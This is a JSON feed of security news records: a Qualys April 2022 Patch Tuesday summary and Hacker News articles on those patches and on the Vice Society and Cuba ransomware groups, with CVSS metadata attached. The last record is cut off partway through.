{"qualysblog": [{"lastseen": "2022-04-19T21:28:45", "description": "## **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 145 vulnerabilities, including 17 Microsoft Edge vulnerabilities, in the April 2022 update, with ten (10) classified as **_Critical_** as they allow Remote Code Execution (RCE). This month\u2019s Patch Tuesday release includes fixes for two (2) zero-day vulnerabilities as well, one (1) known to be actively exploited ([CVE-2022-24521](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>)) and the other to be publicly exposed ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904>)).\n\nMicrosoft has fixed several problems in their software, including Denial of Service, Elevation of Privilege, Information Disclosure, Remote Code Execution, and Spoofing vulnerabilities.\n\n## Notable Microsoft Vulnerabilities Patched\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) covers multiple Microsoft products, including, but not limited to, Azure, Browser (Edge \u2013 Chromium), Developer Tools, Extended Security Update (ESU), Microsoft Dynamics, Microsoft Office, SQL Server, System Center, and Windows.\n\n### **[CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn authenticated user could run a specially crafted trusted solution package to execute arbitrary SQL commands. From there the attacker could escalate and execute commands as db_owner within their Dynamics 356 database.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>) | Windows Network File System Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the [NFS](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) role enabled.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### **[CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>) | Windows SMB Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. For vulnerability to be exploited, a user would need to access a malicious SMB server to retrieve some data as part of an OS API call. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>) | Windows Server Service Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) | Remote Procedure Call (RPC) Runtime Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nTo exploit this vulnerability, an attacker would need to send a specially crafted Remote Procedure Call (RPC) to an RPC host. This could result in remote code execution (RCE) on the server-side with the same permissions as the RPC service. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n## Notable Adobe Vulnerabilities Patched\n\nAdobe released four (4) [advisories ](<https://helpx.adobe.com/security/security-bulletin.html>)with updates to fix 78 vulnerabilities affecting Acrobat, Acrobat Reader, Adobe After Effects, Adobe Commerce, Magento Open Source, and Photoshop. Of these 78 vulnerabilities, 51 are rated as **_Critical_**.\n\n### **[APSB22-13](<https://helpx.adobe.com/security/products/magento/apsb22-13.html>) | Security update available for Adobe Commerce**\n\nThis update resolves one (1) **_Critical_** vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a critical Arbitrary code execution vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### **[APSB22-16](<https://helpx.adobe.com/security/products/acrobat/apsb22-16.html>) | Security update available for Adobe Acrobat and Reader**\n\nThis update resolves multiple **_Critical, Important, _**_and** Moderate**_ vulnerabilities and addresses 62 CVEs. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. Successful exploitation could lead to arbitrary code execution, memory leak, security feature bypass, and privilege escalation. \n\n* * *\n\n### **[APSB22-19](<https://helpx.adobe.com/security/products/after_effects/apsb22-19.html>)** | **Security Updates Available for Adobe After Effects**\n\nThis update addresses two (2) **_Critical _**security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe After Effects for Windows and macOS. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### **[APSB22-20](<https://helpx.adobe.com/security/products/photoshop/apsb22-20.html>) |** **Security update available for Adobe Photoshop**\n\nThis update addresses 13 **_Critical_** security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. Successful exploitation could lead to arbitrary code execution.\n\n## About Qualys Patch Tuesday\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>) followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n![](https://blog.qualys.com/wp-content/uploads/2022/04/VMDR-April2022-1-1070x490.png)\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n\n`( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n![](https://blog.qualys.com/wp-content/uploads/2022/04/PATCH-April2022-1-1070x488.png)\n\n* * *\n\n## Monthly Webinar Series: This Month in Vulnerabilities & Patches \n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/image-1070x560.jpeg)\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Patch Management. \n\n* * *\n\n### ******Join the webinar******\n\n## ******This Month in Vulnerabilities & Patches******\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n## Contributor\n\n[Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), **Director, Vulnerability and Threat Research, Qualys**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T20:07:30", "type": "qualysblog", "title": "April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-12T20:07:30", "id": "QUALYSBLOG:C3DA3EB171A3FE51549E5B118BC0C7BB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:28", "description": "[![Windows Update](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbZwO6vnWge-kB0sbo0SgRtCUuTnNCYuc3xeMOyHAyjxQuihLyYRfJUPPNnr9Hdgc6BFVncdVwHE2gIRh9I0SI81pValTrymqbOyAXfBo-FmM1Fwi8nQX6E1Djh0A8ozTup2--3iCklRk1LE5r01IA9Jp0rkAwlGLx5wQY7JvMVnb9DA0493CuD7fG/s728-e1000/windows-patch-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbZwO6vnWge-kB0sbo0SgRtCUuTnNCYuc3xeMOyHAyjxQuihLyYRfJUPPNnr9Hdgc6BFVncdVwHE2gIRh9I0SI81pValTrymqbOyAXfBo-FmM1Fwi8nQX6E1Djh0A8ozTup2--3iCklRk1LE5r01IA9Jp0rkAwlGLx5wQY7JvMVnb9DA0493CuD7fG/s728-e100/windows-patch-update.jpg>)\n\nMicrosoft's Patch Tuesday updates for the month of April have addressed a [total of 128 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) spanning across its software product portfolio, including Windows, Defender, Office, Exchange Server, Visual Studio, and Print Spooler, among others.\n\n10 of the 128 bugs fixed are rated Critical, 115 are rated Important, and three are rated Moderate in severity, with one of the flaws listed as publicly known and another under active attack at the time of the release.\n\nThe updates are in addition to [26 other flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) resolved by Microsoft in its Chromium-based Edge browser since the start of the month.\n\nThe actively exploited flaw ([CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), CVSS score: 7.8) relates to an elevation of privilege vulnerability in the Windows Common Log File System (CLFS). Credited with reporting the flaw are the U.S. National Security Agency (NSA) and CrowdStrike researchers Adam Podlosky and Amir Bazine.\n\nThe second publicly-known zero-day flaw ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>), CVSS score: 7.0) also concerns a case of privilege escalation in the Windows User Profile Service, successful exploitation of which \"requires an attacker to win a race condition.\"\n\nOther critical flaws to note include a number of remote code execution flaws in RPC Runtime Library ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>), CVSS score: 9.8), Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), CVSS scores: 9.8), Windows Server Service ([CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)), Windows SMB ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>)), and Microsoft Dynamics 365 ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)).\n\nMicrosoft also patched as many as 18 flaws in Windows DNS Server, one information disclosure flaw and 17 remote code execution flaws, all of which were reported by security researcher Yuki Chen. Also remediated are 15 privilege escalation flaws in the Windows Print Spooler component.\n\nThe patches arrive a week after the tech giant announced plans to make available a feature called [AutoPatch](<https://thehackernews.com/2022/04/microsofts-new-autopatch-feature-to.html>) in July 2022 that allows enterprises to expedite applying security fixes in a timely fashion while emphasizing on scalability and stability.\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-04-01>)\n * [Apache Struts 2](<https://cwiki.apache.org/confluence/display/WW/S2-062>)\n * [Cisco Systems](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_11.html>)\n * [HP Teradici PCoIP Client](<https://support.hp.com/us-en/security-bulletins>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-April/thread.html>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T03:22:00", "type": "thn", "title": "Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-13T03:22:09", "id": "THN:2A188AB3A1960F89715831B15A68311E", "href": "https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T14:51:13", "description": "[![Vice Society Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjyOiUSyrTGvh6ufFGvLkc3O1z4zyJOQVog8w48TWB67JBQqpFfZoIQlcw7w8cGW0ABfsJSdetJ-a7xoS28tfEkT29EdwdIbnSiLsA4VNJWy0rAW-4ekqEjVrNTW7mb_0OXoIb7yTIt7iES2uQe_Q3-mUTd_NhNEVN4TUo6KYl1Cn5s1N3wrhXN9FHD/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjyOiUSyrTGvh6ufFGvLkc3O1z4zyJOQVog8w48TWB67JBQqpFfZoIQlcw7w8cGW0ABfsJSdetJ-a7xoS28tfEkT29EdwdIbnSiLsA4VNJWy0rAW-4ekqEjVrNTW7mb_0OXoIb7yTIt7iES2uQe_Q3-mUTd_NhNEVN4TUo6KYl1Cn5s1N3wrhXN9FHD/s728-e100/ransomware.jpg>)\n\nA cybercrime group known as **Vice Society** has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors.\n\nThe Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using exfiltrated stolen data.\n\n\"Shifting ransomware payloads over time from [BlackCat](<https://thehackernews.com/2022/09/blackcat-ransomware-attackers-spotted.html>), [Quantum Locker](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked,\" the tech giant's cybersecurity division [said](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>).\n\nVice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom.\n\n\"Unlike other RaaS (Ransomware-as-a-Service) double extortion groups, Vice Society focuses on getting into the victim system to deploy ransomware binaries sold on Dark web forums,\" cybersecurity company SEKOIA [said](<https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/>) in an analysis of the group in July 2022.\n\nThe financially motivated threat actor is known to rely on exploits for publicly disclosed vulnerabilities in internet-facing applications for initial access, while also using PowerShell scripts, repurposed legitimate tools, and commodity backdoors such as [SystemBC](<https://thehackernews.com/2020/12/ransomware-attackers-using-systembc.html>) prior to deploying the ransomware.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnSYNgIGYh4RKJNWOt90zF3uAXZnv74Cd4rglNTW3jfh5Iaks75NZIlh8koQbP5sbAHi6Dezt7wpobiwvszy0bxZOZT-pVbIXv5E06u2sNZKlM8YWx8pJh9nO1bAdQzyT-EAUNu0ltiLC1emy1wKWLuxvSRDiAMYkc2u2zU7NNFg-t1QBRI9n_mMDA/s728-e100/Windows.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnSYNgIGYh4RKJNWOt90zF3uAXZnv74Cd4rglNTW3jfh5Iaks75NZIlh8koQbP5sbAHi6Dezt7wpobiwvszy0bxZOZT-pVbIXv5E06u2sNZKlM8YWx8pJh9nO1bAdQzyT-EAUNu0ltiLC1emy1wKWLuxvSRDiAMYkc2u2zU7NNFg-t1QBRI9n_mMDA/s728-e100/Windows.jpg>)\n\nVice Society actors have also been spotted leveraging Cobalt Strike for lateral movement, in addition to creating scheduled tasks for persistence and abusing vulnerabilities in Windows Print Spooler (aka [PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)) and Common Log File System ([CVE-2022-24521](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)) to escalate privileges.\n\n\"Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files, using process injection, and likely use evasion techniques to defeat automated dynamic analysis,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) last month.\n\nIn one July 2022 incident disclosed by Microsoft, the threat actor is said to have attempted to initially deploy QuantumLocker executables, only to follow it up with suspected Zeppelin ransomware binaries five hours later.\n\n\"Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution,\" Redmond pointed out.\n\nAmong other tools utilized by DEV-0832 is a Go-based backdoor called PortStarter that offers the capability to alter firewall settings and open ports to establish connections with pre-configured command-and-control (C2) servers.\n\nVice Society, aside from taking advantage of living-off-the-land binaries (LOLBins) to run malicious code, has also been found attempting to turn off Microsoft Defender Antivirus using registry commands.\n\nData exfiltration is eventually achieved by launching a PowerShell script that transmits wide-ranging sensitive information, ranging from financial documents to medical data, to a hard-coded attacker-owned IP address.\n\nRedmond further pointed out that the cybercrime group focuses on organizations with weaker security controls and a higher likelihood of a ransom payout, underscoring the need to [apply necessary safeguards](<https://www.cisa.gov/stopransomware/stopransomware>) to prevent such attacks.\n\n\"The shift from a ransomware as a service (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities,\" Microsoft said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-26T08:13:00", "type": "thn", "title": "Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-10-26T13:13:50", "id": "THN:3D23E7265CBC033DE214A1FFC7A5E648", "href": "https://thehackernews.com/2022/10/vice-society-hackers-are-behind-several.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-02T15:09:47", "description": "[![Cuba Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg8tTIoIM0jQbURH5PDnsmJRHY_lsHAklLsSwnnCy4L7peXJqw9IBIpKPUPJkyvg7_m2_n7uzGNLygUAk9J5Dn1ZMtuO--1mRGpLx-qpO8G7CW-Gwx2PUYYtWv5OuALZiA0xTKhEua4hbOnjAEwvt7sqxbdY3BamBoL-I5UxsUNssvzOcfgQIAVuHC0/s728-e1000/cuba-ransomware.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg8tTIoIM0jQbURH5PDnsmJRHY_lsHAklLsSwnnCy4L7peXJqw9IBIpKPUPJkyvg7_m2_n7uzGNLygUAk9J5Dn1ZMtuO--1mRGpLx-qpO8G7CW-Gwx2PUYYtWv5OuALZiA0xTKhEua4hbOnjAEwvt7sqxbdY3BamBoL-I5UxsUNssvzOcfgQIAVuHC0/s728-e100/cuba-ransomware.png>)\n\nThe threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022.\n\nIn a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies [highlighted](<https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware>) a \"sharp increase in both the number of compromised U.S. entities and the ransom amounts.\"\n\nThe ransomware crew, also known as [Tropical Scorpius](<https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html>), has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks.\n\nIt's worth noting that despite the name \"Cuba,\" there is no evidence to suggest that the actors have any connection or affiliation with the island country.\n\nThe entry point for the attacks involves the exploitation of known security flaws, phishing, compromised credentials, and legitimate remote desktop protocol (RDP) tools, followed by distributing the ransomware via [Hancitor](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hancitor-malware>) (aka Chanitor).\n\nSome of the flaws incorporated by Cuba into its toolset are as follows -\n\n * [**CVE-2022-24521**](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) (CVSS score: 7.8) - An elevation of privilege vulnerability in Windows Common Log File System (CLFS) Driver\n * [**CVE-2020-1472**](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) (CVSS score: 10.0) - An elevation of privilege vulnerability in Netlogon remote protocol (aka ZeroLogon)\n\n\"In addition to deploying ransomware, the actors have used 'double extortion' techniques, in which they exfiltrate victim data, and (1) demand a ransom payment to decrypt it and, (2) threaten to publicly release it if a ransom payment is not made,\" CISA noted.\n\nCuba is also said to share links with the operators of RomCom RAT and another ransomware family called Industrial Spy, according to recent findings from BlackBerry and Palo Alto Networks Unit 42.\n\nThe RomCom RAT is [distributed](<https://thehackernews.com/2022/11/hackers-using-rogue-versions-of-keepass.html>) through trojanized versions of legitimate software such as SolarWinds Network Performance Monitor, KeePass, PDF Reader Pro, Advanced IP Scanner, pdfFiller, and Veeam Backup & Replication that are hosted on counterfeit lookalike websites.\n\nThe advisory from CISA and FBI is the latest in a series of alerts the agencies have issued about different ransomware strains such as [MedusaLocker](<https://www.cisa.gov/uscert/ncas/alerts/aa22-181a>), [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), [Vice Society](<https://thehackernews.com/2022/10/vice-society-hackers-are-behind-several.html>), [Daixin Team](<https://thehackernews.com/2022/10/cisa-warns-of-daixin-team-hackers.html>), and [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>).\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-02T06:04:00", "type": "thn", "title": "Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 